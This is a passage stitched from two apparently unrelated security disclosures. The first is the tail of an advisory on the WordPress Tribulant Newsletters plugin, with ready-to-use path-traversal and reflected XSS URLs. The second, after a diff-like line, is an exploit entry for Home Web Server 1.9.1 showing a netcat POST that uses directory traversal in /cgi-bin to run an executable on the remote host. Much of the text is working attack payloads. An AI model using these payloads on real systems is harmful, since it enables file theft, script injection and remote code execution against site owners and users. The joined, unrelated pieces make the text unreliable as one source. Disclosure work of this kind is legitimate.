Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini
3.2 Cross-Site Scripting
----
Input: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.3 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start
3.4 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.5 Cross-Site Scripting
----
Input: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>
3.6 Cross-Site Scripting
----
Input: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3.7 Cross-Site Scripting
----
Input: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.8 Cross-Site Scripting
----
Input: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded, update released
2017/05/29 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/

View file

@ -0,0 +1,46 @@
# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps
"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him
Description :
-------------
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
it is possible to run any executable being on the remote host.
Instructions:
-------------
- Starts Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""
# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)
"""
[CTRL+C] : this is important to launch the executable we requested
Calc.exe has been launched on the remote host.
"""